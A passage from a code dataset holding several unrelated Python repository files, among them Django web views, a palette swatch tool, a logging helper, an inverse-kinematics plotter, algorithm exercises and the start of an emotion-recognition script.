yhat_raw=prediction, k=15 )\n evaluation_metric.print_metrics( metric )\n\n ## !!!! \n print ('\\n\\nnot expand GO set')\n prediction = ExpandGOSetOnBlast.dict2matrix(BlastResult,prot_array)\n get_found = np.where ( np.sum(prediction,1) > 0 ) [ 0 ]\n prediction = prediction[get_found,:]\n metric = evaluation_metric.all_metrics ( np.round(prediction), true_label, yhat_raw=prediction, k=15 )\n evaluation_metric.print_metrics( metric )\n\n print ('\\n\\nsee example')\n print ( BlastResult['Q92543'] ) \n print ( BlastResultExpand['Q92543'] ) \n\nif len(sys.argv)<1: ## run script\n\tprint(\"Usage: \\n\")\n\tsys.exit(1)\nelse:\n\tsubmitJobs ( sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8] )\n\n\n\n","repo_name":"datduong/EncodeGeneOntology","sub_path":"blastp/NotUse/do_expand_set.py","file_name":"do_expand_set.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"21713153912","text":"import argparse\r\nimport math\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\n\r\n\r\ndef load_JASC(f):\r\n # check header and parse palette length\r\n assert next(f) == \"JASC-PAL\\n\"\r\n assert next(f) == \"0100\\n\"\r\n count = int(next(f))\r\n\r\n # parse entries\r\n colors = np.zeros((count, 3), dtype=np.uint8)\r\n for i in range(count):\r\n colors[i, :] = [int(chan) for chan in next(f).split(\" \")]\r\n\r\n # this ought to be the end of the file\r\n assert not f.read()\r\n\r\n return colors\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"input\", type=Path)\r\n parser.add_argument(\"-o\", dest=\"output\", type=Path, required=True)\r\n parser.add_argument(\"--scale\", type=int, required=True)\r\n\r\n args = parser.parse_args()\r\n\r\n with open(args.input) as f:\r\n palette = load_JASC(f)\r\n\r\n cols = min(len(palette), 16) # max 16 columns\r\n rows = math.ceil(len(palette) / cols)\r\n\r\n S = args.scale\r\n img = Image.new(\"RGB\", (cols * S, rows * S))\r\n draw = ImageDraw.Draw(img)\r\n\r\n for i, rgb in enumerate(palette):\r\n yy = i // cols\r\n xx = i % cols\r\n draw.rectangle((xx * S, yy * S, (xx + 1) * S, (yy + 1) * S), fill=tuple(rgb))\r\n\r\n img.save(args.output)\r\n","repo_name":"mcejp/palette-tools","sub_path":"jasc-generate-swatch.py","file_name":"jasc-generate-swatch.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74499567821","text":"from typing import Any\nfrom django.contrib.auth.models import User\nfrom django.http import Http404\nfrom django.views.generic.list import ListView\nfrom django.shortcuts import redirect\n\nfrom wagtail.contrib.modeladmin.views import CreateView\nfrom wagtail.admin import messages\nfrom wagtail.search.models import Query\n\nfrom .models import BlogPostPage, PostCategoryPage\n\n\nclass UsersBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user_name = self.kwargs.get('username', '')\n author = User.objects.get(username=user_name)\n context['posts'] = BlogPostPage.objects.filter(owner=author.id)\n context['author'] = author\n return context\n\n\nclass TagsBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n tag = self.kwargs.get('tag', '')\n context['posts'] = BlogPostPage.objects.filter(tags__name=tag)\n context['tag'] = tag\n return context\n\n\n\nclass CategoriesBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n cat_id = self.kwargs.get('cat_id', '')\n if cat_id == 0:\n context['posts'] = BlogPostPage.objects.all()\n else: \n context['posts'] = BlogPostPage.objects.filter(category=cat_id).order_by(\"-created\")\n context['categories'] = PostCategoryPage.objects.all().order_by('category_title')\n context['cat_selected'] = PostCategoryPage.objects.filter(id=cat_id).first()\n return context\n\n\nclass SearchBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n\n if not allow_empty:\n if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n is_empty = not self.object_list.exists()\n else:\n is_empty = not self.object_list\n if is_empty:\n raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n 'class_name': self.__class__.__name__,\n })\n\n search_query = request.GET.get('query', None)\n if search_query:\n search_results = BlogPostPage.objects.order_by(\"-created\").search(search_query)\n Query.get(search_query).add_hit()\n else:\n search_results = BlogPostPage.objects.none()\n context = self.get_context_data()\n context['posts'] = search_results\n context['query'] = search_query\n return self.render_to_response(context)\n\n\nclass ProfileCreateView(CreateView):\n \n def form_valid(self, form):\n form.instance.user = self.request.user\n instance = form.save()\n messages.success(\n self.request, self.get_success_message(instance),\n buttons=self.get_success_message_buttons(instance)\n )\n return redirect(self.get_success_url())\n\n","repo_name":"ckan/ckan.org","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"70939713102","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, Http404\nfrom django.contrib import messages\nfrom django.views import View\nfrom django.utils import timezone\n\nfrom .models import Profile, Post, Products\nfrom .forms import PostForm, FeedbackForm\nfrom datetime import datetime\n\nimport pytz\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\",{})\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef about(request):\n return render(request, \"about.html\")\n# Display all alumni except the current logged in user\ndef displayAlumni(request):\n if request.user.is_authenticated: \n profiles = Profile.objects.exclude(user=request.user)\n return render(request, \"alumni_list.html\",{\"profiles\":profiles})\n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\ndef displayUserProfile(request, pk):\n if request.user.is_authenticated:\n profile = Profile.objects.get(user__id= pk)\n return render(request, \"user_profile.html\",{\"profile\":profile}) \n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\ndef editUserProfile(request, pk):\n if request.user.is_authenticated:\n # Redirect to original profile user \n if pk != request.user.id:\n return redirect(f'/edit_profile/{request.user.id}')\n \n # Get profile object\n profile = Profile.objects.get(user__id= pk)\n \n if request.method == 'POST':\n names = request.POST['fullName'].split()\n print(names)\n profile.user.first_name = names[0]\n profile.user.last_name = \" \".join(names[1:])\n profile.user.email = request.POST['email']\n profile.avatar = request.FILES.get('avatar',None)\n profile.save()\n profile.user.save()\n messages.success(request, \"Changes saved, successfully!\")\n return render(request, \"user_profile_edit.html\",{\"profile\":profile}) \n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\n\nclass PostListView( View ):\n \n def get(self, request, *args, **kwargs):\n posts = Post.objects.all().order_by(\"-publish_date\").filter(publish_date__lte=timezone.now().astimezone(pytz.utc))\n print(posts[0].created_at)\n print(posts[0].publish_date)\n print(timezone.now().astimezone(pytz.utc))\n print(len(posts))\n \n form = PostForm()\n return render(request, 'post_list.html', {'post_list' : posts, 'form':form})\n def post(self, request, *args, **kwargs):\n posts = Post.objects.all().order_by(\"-created_at\")\n form = PostForm(request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.user = request.user\n new_post.save()\n return render(request, 'post_list.html', {'post_list' : posts, 'form':form})\n\nclass PostDetailView(View):\n def get(self, request, pk, *args, **kwargs):\n post = Post.objects.get(pk=pk)\n form = FeedbackForm()\n return render(request, 'post_detail.html',{'post':post, 'form':form})\n \nclass PostCreateView(View):\n def get(self, request, *args, **kwargs):\n form = PostForm(request.POST) \n return render(request, 'add_post.html', {'form':form})\n def post(self, request, *args, **kwargs):\n form = PostForm(request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.user = request.user\n new_post.save()\n return render(request, 'add_post.html', {'form':form})\n \n# Products/Services\nclass ServiceListView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'products.html',{}) \n \nclass CartListView(View):\n def get(self, request, *args, **kwargs):\n return render(request, \"cart.html\", {})\n \n\nclass DashboardView(View):\n def get(self, request, *args, **kwargs):\n return render(request, \"dashboard\\dashboard.html\", {})\n\n\nclass ProductAdd(View):\n def get(self, request, *args, **kwargs):\n \n return render(request, 'dashboard\\dashboard_product_add.html')\n def post(self,request,*args, **kwargs):\n if request.method == \"POST\" :\n data = request.POST\n product_name = data.get('product_name')\n product_category = data.get('product_category')\n product_subcategory = data.get('product_subcategory')\n product_price = data.get('product_price')\n product_desc = data.get('product_desc')\n product_image = request.FILES.get('product_image')\n Products.objects.create(\n product_name = product_name,\n product_category = product_category,\n product_subcategory = product_subcategory,\n product_price = product_price,\n product_desc = product_desc,\n product_image = product_image,\n )\n return redirect('/dashboard/dashboard_products')\n\nclass ProductDelete(View): \n def get (self,request, id,): \n products = Products.objects.get(id=id)\n products.delete()\n return redirect('/dashboard/dashboard_products')\nclass ProductUpdate(View):\n def get(self, request, id):\n products = Products.objects.get(id=id)\n context = {'products' : products}\n return render(request, 'dashboard\\dashboard_product_edit.html',context)\n \n def post(self,request,*args, **kwargs):\n \n if request.method == \"POST\" :\n data = request.POST\n product_id = data.get('product_id')\n product_name = data.get('product_name')\n product_category = data.get('product_category')\n product_subcategory = data.get('product_subcategory')\n # product_price = data.get('product_price')\n product_desc = data.get('product_desc')\n product_image = request.FILES.get('product_image')\n\n products = Products.objects.get(id=product_id)\n\n products.product_name = product_name\n products.product_category = product_category,\n products.product_subcategory = product_subcategory,\n # products.product_price = product_price,\n products.product_desc = product_desc,\n if product_image:\n products.product_image = product_image,\n products.save()\n return redirect('/dashboard/dashboard_products')\n \n \nclass ProductDetailView(View):\n def get(self, request, *args, **kwargs):\n products = Products.objects.all()\n print(products)\n return render(request, 'dashboard\\dashboard_product.html',{'products':products})\n \n def editProduct(request, id):\n products = Products.objects.get(id = id)\n return render(request, 'dashboard/dashborad_product_edit.html', {'products':products})\n \n def product_update(request, id):\n products = Products.objects.get(id=id)\n form = ProductsForm(request.POST, request.FILES, instance=products)\n if form.is_valid():\n form.save()\n return redirect('product_list')\n else:\n form = ProductsForm(instance=products)\n return render(request, 'dashboard/dashborad_product_edit.html', {'form': form})\n \n def product_destroy(request, id):\n products = Products.objects.get(id=id)\n products.delete()\n return redirect\n","repo_name":"rhranadu/alumniPortal","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12037024936","text":"from globals import *\nfrom controllers.SpaceController import SpaceController as Sc\nfrom schemas.SpaceSchema import SpaceSchema\nfrom classes import Space as Sp\n\n\nclass SpaceView:\n\n \"\"\"Space module view class\"\"\"\n\n def __init__(self, db):\n self.object_collection = []\n self.db = db\n\n def home_view(self):\n while True:\n print(SPACE_VIEW_WELCOME_STR)\n ans = input(\"value: \")\n if ans == '1':\n self.create_space_objects_view()\n print('process ended')\n if ans == '2':\n self.add_locality_space_view()\n print('process ended')\n if ans == '3':\n save = input('save objects ? y/n')\n if save == 'n':\n pass\n else:\n documents_array = []\n collection_name = input('name a collection to save your data')\n print(\"collection : {}\".format(collection_name))\n ans = input(\"confirm y/n\")\n if ans == 'n':\n pass\n else:\n collection = self.db[collection_name]\n for obj in self.object_collection:\n schema = SpaceSchema()\n res = schema.dump(obj)\n documents_array.append(res)\n collection.insert_many(documents_array)\n print(\"SUCCESS :\\n\"\n \"{} document inserted\".format(len(documents_array)))\n\n if ans == '4':\n self.add_continent_view()\n if ans == 'e':\n break\n\n def add_continent_view(self):\n locations = self.db['location_collection']\n for obj in self.object_collection:\n obj.continent_space = Sc.add_continent(obj, locations)\n print(obj.continent_space)\n\n def add_locality_space_view(self):\n \"\"\"\n extract locality location and produce the corresponding array\n :returns: locality ids array\n \"\"\"\n locations = self.db['locations']\n for obj in self.object_collection:\n res = Sc.add_locality_country_space(obj.space, locations)\n obj.locality_space = res[0]\n obj.country_space = res[1]\n obj.region_space = res[2]\n print(\"locality & country space added to each object\")\n\n def create_space_objects_view(self):\n\n empty_objects = 0\n\n show_coll_name = input(\"Select a show collection : \")\n locations_coll_name = input(\"Select a location collection :\")\n if show_coll_name in self.db.collection_names():\n show_collection = self.db[show_coll_name]\n if locations_coll_name in self.db.collection_names():\n location_collection = self.db[locations_coll_name]\n print(\"wait...\")\n for show in show_collection.find():\n\n show_id = show['_id']\n show_title = show[\"title\"]\n locations_array = Sc.get_location_array(show['_id'], location_collection, show_collection)\n space_obj = Sp.Space(show_id, show_title, locations_array)\n\n distance = Sc.distance(space_obj.space, location_collection)\n space_obj.distance = distance\n locations_name_array = Sc.locations_name_array(space_obj.space, location_collection)\n space_obj.locations_name = locations_name_array\n if len(space_obj.space) > 0:\n self.object_collection.append(space_obj)\n else:\n empty_objects += 1\n print(\"{} object created, {} empty show rejected\".format(len(self.object_collection), empty_objects))\n","repo_name":"rerouj/apptp-data-engine","sub_path":"app/views/SpaceView.py","file_name":"SpaceView.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14346169269","text":"import joblib\nfrom static.logic.text_pipeline import TextProcessor\n\ndef predict(text: str):\n # load model\n model = joblib.load('static/logic/datos/MLPClassifier.pkl')\n\n # get text from request\n prediction = model.predict([text])\n\n if prediction == 0:\n return 'negative'\n else:\n return 'positive'\n \ndef predict_with_list(texts: list):\n # load model\n model = joblib.load('static/logic/datos/MLPClassifier.pkl')\n\n # get text from request\n prediction = model.predict(texts)\n\n # Transform 0 for negative and 1 for positive\n prediction = ['negative' if pred == 0 else 'positive' for pred in prediction]\n\n return prediction\n","repo_name":"Zucaritas-BI/Proyecto-1-Parte-2","sub_path":"backend/static/logic/pipeline_predict.py","file_name":"pipeline_predict.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26607259148","text":"# encoding: utf-8\n'''\nhook logging for format log style\n\nCreate on May 27, 2017\n@author: Hongping Wang\n@change: 2017-06-01 Hongping Wang: initialization\n 2017-06-06 Hongping Wang: support write a new log file every day\n 2017-07-27 Qiangqiang Wei: support the log for different project\n 2017-07-28 Qiangqiang Wei: create the new log_base.py and move the code to this script\n 2017-11-04 Hongping Wang: support write log to file and standard output synchronously\n'''\nimport os\nimport logging\n\nfrom logging.handlers import RotatingFileHandler\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport config\n\nclass AutoTestLog():\n '''\n The auto test log\n '''\n\n def create_logger(self, log_file_name='{0}/e2etest_running.log'.format(config.BASE_DIR),\n log_level=logging.DEBUG,\n log_date_format='%Y-%m-%d %H:%M:%S%z',\n log_formater='%(asctime)s %(filename)s:%(funcName)s %(levelname)s [line:%(lineno)d] %(message)s',\n max_log_files=3,\n one_day_one_file=True,\n max_log_file_size=10485760,\n log_to_standard_output=False\n ):\n '''\n @summary: create the logger\n @param log_file_name: the log file name, should be absolute path. default value is /tmp/vamp/videocenter_running.log\n if the value is None or \"\", print the log to standard output\n @param log_level: Integer of the log level. default value is logging.DEBUG\n @param max_log_files: the max number of files. It is valid when one_day_one_file equal False. default value is 3\n @param one_day_one_file: whether only create a file in one day. default value is True, one day one log file\n @param max_log_file_size: the max size of the log file. unit is byte. default value is 10 MB\n @param log_date_format: String of log date format. default value is '%Y-%m-%d %H:%M:%S%z', like 2017-06-01 11:44:06+0000\n @param log_to_standard_output: whether print logs into standard output, this argument will ignore log_file_name value\n @return: the logger\n '''\n # initialize log file\n if log_file_name:\n log_file_name = os.path.abspath(log_file_name) # change path to absolute path\n if not os.path.exists(os.path.dirname(log_file_name)):\n os.makedirs(os.path.dirname(log_file_name))\n\n # write log into file or standard output\n if log_file_name and type(log_file_name) == type('') and log_file_name != '':\n # write log to file\n logger = logging.getLogger(log_file_name)\n logger.setLevel(log_level)\n\n # write a new log file every day\n if one_day_one_file:\n Rthandler = TimedRotatingFileHandler(log_file_name, when='D', backupCount=max_log_files)\n else:\n Rthandler = RotatingFileHandler(log_file_name, maxBytes=max_log_file_size, backupCount=max_log_files)\n formatter = logging.Formatter(fmt=log_formater, datefmt=log_date_format)\n Rthandler.setFormatter(formatter)\n logger.addHandler(Rthandler)\n\n # write log to standard output synchronously\n if log_to_standard_output:\n console = logging.StreamHandler()\n console.setLevel(log_level)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n # write log to standard output default\n else:\n logging.basicConfig(level=log_level, format=log_formater, datefmt=log_date_format)\n logger = logging\n\n return logger\n\n# define application log file path\n__log = AutoTestLog().create_logger(log_to_standard_output=True)\ncritical = __log.critical\nfatal = __log.fatal\nerror = __log.error\nwarning = __log.warning\nwarn = __log.warn\ninfo = __log.info\ndebug = __log.debug\nexception = __log.exception\n\n\n\n#1.日志等级分别有以下几种:\n\n #CRITICAL : 'CRITICAL',\n #ERROR : 'ERROR',\n #WARNING : 'WARNING',\n #INFO : 'INFO',\n #DEBUG : 'DEBUG',\n #NOTSET : 'NOTSET',\n\n #一旦设置了日志等级,则调用比等级低的日志记录函数则不会输出\n #设置日志的步骤:handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 1024*1024, backupCount = 5) # 实例化handler\n #fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'\n\n #formatter = logging.Formatter(fmt) # 实例化formatter\n #handler.setFormatter(formatter) # 为handler添加formatter\n\n #logger = logging.getLogger('tst') # 获取名为tst的logger\n #logger.addHandler(handler) # 为logger添加handler\n #logger.setLevel(logging.DEBUG)\n\n\n\n\n\n\n\n\n\n#2. 自python2.6开始,新增了一种格式化字符串的函数str.format(),可谓威力十足\n #花括号声明{}、用于渲染前的参数引用声明, 花括号里可以用数字代表引用参数的序号, 或者 变量名直接引用。\n #log_file_name='{0}/e2etest_running.log'.format(config.BASE_DIR)\n # 例1: data = {'first': 'Hodor', 'last': 'Hodor!'}\n # old: '%(first)s %(last)s' % data\n # new: '{first} {last}'.format(**data)\n #output: Hodor Hodor1\n\n # 例2:\n #'{:^10}'.format('test')\n #output: ' test '\n #'{:<10}'.format('test')\n # output:'test '\n\n\n\n# 3.TimedRotatingFileHandler:\n # TimedRotatingFileHandler(filename [,when [,interval [,backupCount]]])\n #filename 是输出日志文件名的前缀\n #when 是一个字符串的定义如下:\n #“S”: Seconds\n #“M”: Minutes\n #“H”: Hours\n #“D”: Days\n #“W”: Week day (0=Monday)\n #“midnight”: Roll over at midnight\n #backupCount 是保留日志个数。默认的0是不会自动删除掉日志。若设3,则在文件的创建过程中\n #库会判断是否有超过这个3,若超过,则会从最先创建的开始删除。\n #RotatingFileHandler:\n\n","repo_name":"Tingmeili/Python","sub_path":"learn_python/log_base.py","file_name":"log_base.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73080613263","text":"from typing import List\n\n\nclass Solution:\n def maximumScore(self, nums: List[int], multipliers: List[int]) -> int:\n\n l = len(multipliers)\n\n def dfs(i, j, idx=0, memo={}):\n key = f'{i},{j},{idx}'\n if key in memo:\n return memo[key]\n if idx >= len(multipliers):\n return 0\n res = max(nums[i] * multipliers[idx] + dfs(i + 1, j, idx + 1, memo),\n nums[j] * multipliers[idx] + dfs(i, j - 1, idx + 1, memo))\n memo[key] = res\n return res\n\n return dfs(0, len(nums) - 1)\n\n def maximumScore_dp(self, nums: List[int], muls: List[int]) -> int:\n l = len(nums)\n dp = [[0 for _ in range(l)] for _ in range(l)]\n\n def getScore(i, j, idx=0):\n if idx >= len(muls):\n return 0\n if dp[i][j] == 0:\n dp[i][j] = max(nums[i] * muls[idx] + getScore(i + 1, j, idx + 1),\n nums[j] * muls[idx] + getScore(i, j - 1, idx + 1))\n\n return dp[i][j]\n\n getScore(0, l - 1)\n return dp[0][-1]\n\n\nnums = [-5, -3, -3, -2, 7, 1]\nmultipliers = [-10, -5, 3, 4, 6]\n\ns = Solution()\nprint(s.maximumScore(nums, multipliers))\nprint(s.maximumScore_dp(nums, multipliers))\n","repo_name":"BYJRK/LeetCode-Solutions","sub_path":"Problems/Dynamic Programming/1770. Maximum Score from Performing Multiplication Operations.py","file_name":"1770. Maximum Score from Performing Multiplication Operations.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16280714991","text":"from sys import stdin as s\r\nfrom collections import deque\r\n\r\nN, M = map(int, s.readline().rstrip().split())\r\n\r\ngraph = [[] for _ in range(N + 1)]\r\nfor i in range(M):\r\n a, b = map(int, s.readline().rstrip().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\nanswer = [0, 999999]\r\nfor i in range(1, N + 1):\r\n queue = deque([graph[i]])\r\n visited = [False] * (N + 1)\r\n\r\n score = [-1] * N\r\n level = 1\r\n while queue[0]:\r\n temp = []\r\n pop = queue.popleft()\r\n for n in pop:\r\n if not visited[n]:\r\n visited[n] = True\r\n temp += graph[n]\r\n if score[n - 1] == -1:\r\n score[n - 1] = level\r\n level += 1\r\n queue.append(temp)\r\n\r\n if answer[1] > sum(score) - score[i - 1]:\r\n answer[0] = i\r\n answer[1] = sum(score) - score[i - 1]\r\n\r\nprint(answer[0])\r\n","repo_name":"SeoYoungDeok/Coding_Test","sub_path":"백준/Silver/1389. 케빈 베이컨의 6단계 법���/케빈 베이컨의 6단계 법칙.py","file_name":"케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74207943181","text":"from math import degrees, cos, sin, sqrt\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom matplotlib.lines import Line2D\nfrom Kinematics import Kinematics\n# from AnglePlot import get_angle_plot, get_angle_text\nfrom matplotlib.patches import Arc\nimport random\n\n\ndef distancia(x1, y1, x2, y2):\n return sqrt((x2-x1)**2+(y2-y1)**2)\n\n\ndef plotInverseK(l1, l2, px, py):\n plot_limit = l1 + l2\n\n model = Kinematics(l1, l2)\n theta1, theta2 = model.makeInverse(px, py)\n theta1 = -theta1 if False else theta1\n\n x0 = 0\n y0 = 0\n x1 = l1*cos(theta1)\n y1 = l1*sin(theta1)\n x2 = x1+l2*cos(theta1+theta2)\n y2 = y1+l2*sin(theta1+theta2)\n x3 = x1+l2*cos(theta1)\n y3 = y1+l2*sin(theta1)\n\n if distancia(px, py, x2, y2) > 0.0001:\n theta1 = -theta1\n x0 = 0\n y0 = 0\n x1 = l1*cos(theta1)\n y1 = l1*sin(theta1)\n x2 = x1+l2*cos(theta1+theta2)\n y2 = y1+l2*sin(theta1+theta2)\n x3 = x1+l2*cos(theta1)\n y3 = y1+l2*sin(theta1)\n\n print(degrees(theta1), degrees(theta2))\n\n fig = plt.figure()\n ax = fig.add_subplot(\n 1, 1, 1, xlim=(-plot_limit, plot_limit), ylim=(-plot_limit, plot_limit))\n\n line_1 = Line2D([x0, x1], [y0, y1], linewidth=1,\n linestyle=\"-\", color=\"blue\")\n line_2 = Line2D([x1, x2], [y1, y2], linewidth=1,\n linestyle=\"-\", color=\"cyan\")\n line_3 = Line2D([x1, x3], [y1, y3], linewidth=1,\n linestyle=\"--\", color=\"cyan\", alpha=0.4)\n\n ax.add_line(line_1)\n ax.add_line(line_2)\n ax.add_line(line_3)\n\n arc1 = Arc(\n [0, 0],\n plot_limit/10,\n plot_limit/10,\n 0,\n 0 if theta1 > 0 else degrees(theta1),\n degrees(theta1) if theta1 > 0 else 0,\n color=\"blue\"\n )\n ax.add_patch(arc1)\n\n ax.text(\n plot_limit/10*cos(theta1/2),\n plot_limit / 15*sin(theta1/2),\n \"%0.2f\" % degrees(theta1)+u\"\\u00b0\",\n fontsize=8,\n color=\"blue\"\n )\n\n arc2 = Arc(\n [x1, y1],\n plot_limit/10,\n plot_limit/10,\n degrees(theta1),\n degrees(theta2) if theta2 < 0 else 0,\n 0 if theta2 < 0 else degrees(theta2),\n color=\"cyan\" if abs(degrees(theta2)) <= 135 else \"red\"\n )\n\n ax.text(\n x1 + plot_limit/10*cos(theta1 + theta2/2),\n y1 + plot_limit/10*sin(theta1 + theta2/2),\n \"%0.2f\" % degrees(theta2)+u\"\\u00b0\",\n fontsize=8,\n color=\"cyan\" if abs(degrees(theta2)) <= 135 else \"red\"\n )\n\n ax.add_patch(arc2)\n\n ax.text(\n x2 + plot_limit/25,\n y2 + plot_limit/25,\n \"(\" + \"%0.2f\" % px + \",\" + \"%0.2f\" % py + \")\",\n fontsize=8,\n color=\"magenta\"\n )\n\n ax.plot(px, py, 'o', color='m')\n ax.grid()\n\n plt.show()\n\n\ndef pruebasAleatorias(n):\n for i in range(n):\n l1 = random.random()\n l2 = random.random()\n px = 2*random.random()-1\n py = 2*random.random()-1\n\n print()\n print(f'Prueba {i}:')\n print(f'l1 = {l1}')\n print(f'l2 = {l2}')\n print(f'px = {px}')\n print(f'py = {py}')\n\n try:\n plotInverseK(l1, l2, px, py)\n except:\n print(\n f\"No es posible alcanzar el punto ({px},{py}), con los brazos de longitud l1={l1} y l2={l2}\")\n\n\ndef pruebasObtenerCoordenadas():\n while True:\n print()\n l1 = float(input('Ingrese la longitud del brazo 1: '))\n l2 = float(input('Ingrese la longitud del brazo 2: '))\n px = float(input('Ingrese la coordenada x del punto p: '))\n py = float(input('Ingrese la coordenada y del punto p: '))\n\n try:\n plotInverseK(l1, l2, px, py)\n except:\n print(\n f\"No es posible alcanzar el punto ({px},{py}), con los brazos de longitud l1={l1} y l2={l2}\")\n\n\nif __name__ == '__main__':\n pruebasAleatorias(20)\n # pruebasObtenerCoordenadas()\n","repo_name":"fpalaciosFM/Inverse_Kinematics-2gdl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28295831398","text":"import cv2, glob, random, math, numpy as np, dlib, itertools\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn import linear_model\n\nemotions = [\"Disgust\",\"Angry\",\"Fear\",\"Surprise\"]#, \"Happy\", \"Neutral\", \"Sad\"] #Emotion list\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\") \n\n#clf = SVC(kernel='linear', probability=True, tol=1e-3)\n\nclf = RandomForestClassifier(min_samples_leaf=20)\n\n#clf = linear_model.LogisticRegression(C=1e5)\n\n\n#n_estimators = 10\n#clf = OneVsRestClassifier(BaggingClassifier(SVC(kernel='linear', probability=True, class_weight='balanced'), max_samples=1.0 / n_estimators, n_estimators=n_estimators),n_jobs=-1)\n\n\ndef get_files(emotion):\n print(\"./images/%s/*\" %emotion)\n files = glob.glob(\"./images/%s/*\" %emotion)\n print(len(files))\n \n random.shuffle(files)\n training = files[:int(len(files)*0.8)] #get first 80% of file list\n prediction = files[-int(len(files)*0.2):] #get last 20% of file list\n \n return training, prediction\n\ndef get_landmarks(image):\n detections = detector(image, 1)\n for k,d in enumerate(detections): #For all detected face instances individually\n shape = predictor(image, d) #Draw Facial Landmarks with the predictor class\n xlist = []\n ylist = []\n for i in range(1,68): #Store X and Y coordinates in two lists\n xlist.append(float(shape.part(i).x))\n ylist.append(float(shape.part(i).y))\n \n xmean = np.mean(xlist) #Get the mean of both axes to determine centre of gravity\n ymean = np.mean(ylist)\n xcentral = [(x-xmean) for x in xlist] #get distance between each point and the central point in both axes\n ycentral = [(y-ymean) for y in ylist]\n\n if xlist[26] == xlist[29]: #If x-coordinates of the set are the same, the angle is 0, catch to prevent 'divide by 0' error in function\n anglenose = 0\n else:\n anglenose = int(math.atan((ylist[26]-ylist[29])/(xlist[26]-xlist[29]))*180/math.pi)\n\n if anglenose < 0:\n anglenose += 90\n else:\n anglenose -= 90\n\n landmarks_vectorised = []\n for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):\n landmarks_vectorised.append(x)\n landmarks_vectorised.append(y)\n meannp = np.asarray((ymean,xmean))\n coornp = np.asarray((z,w))\n dist = np.linalg.norm(coornp-meannp)\n anglerelative = (math.atan((z-ymean)/(w-xmean))*180/math.pi) - anglenose\n landmarks_vectorised.append(dist)\n landmarks_vectorised.append(anglerelative)\n\n if len(detections) < 1: \n landmarks_vectorised = \"error\"\n return landmarks_vectorised\n\ndef make_sets():\n training_data = []\n training_labels = []\n prediction_data = []\n prediction_labels = []\n for emotion in emotions:\n training, prediction = get_files(emotion)\n for item in training:\n image = cv2.imread(item) #open image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale\n clahe_image = clahe.apply(gray)\n landmarks_vectorised = get_landmarks(clahe_image)\n if landmarks_vectorised == \"error\":\n pass\n else:\n training_data.append(landmarks_vectorised) #append image array to training data list\n training_labels.append(emotions.index(emotion))\n \n for item in prediction:\n image = cv2.imread(item)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_vectorised = get_landmarks(clahe_image)\n if landmarks_vectorised == \"error\":\n pass\n else:\n prediction_data.append(landmarks_vectorised)\n 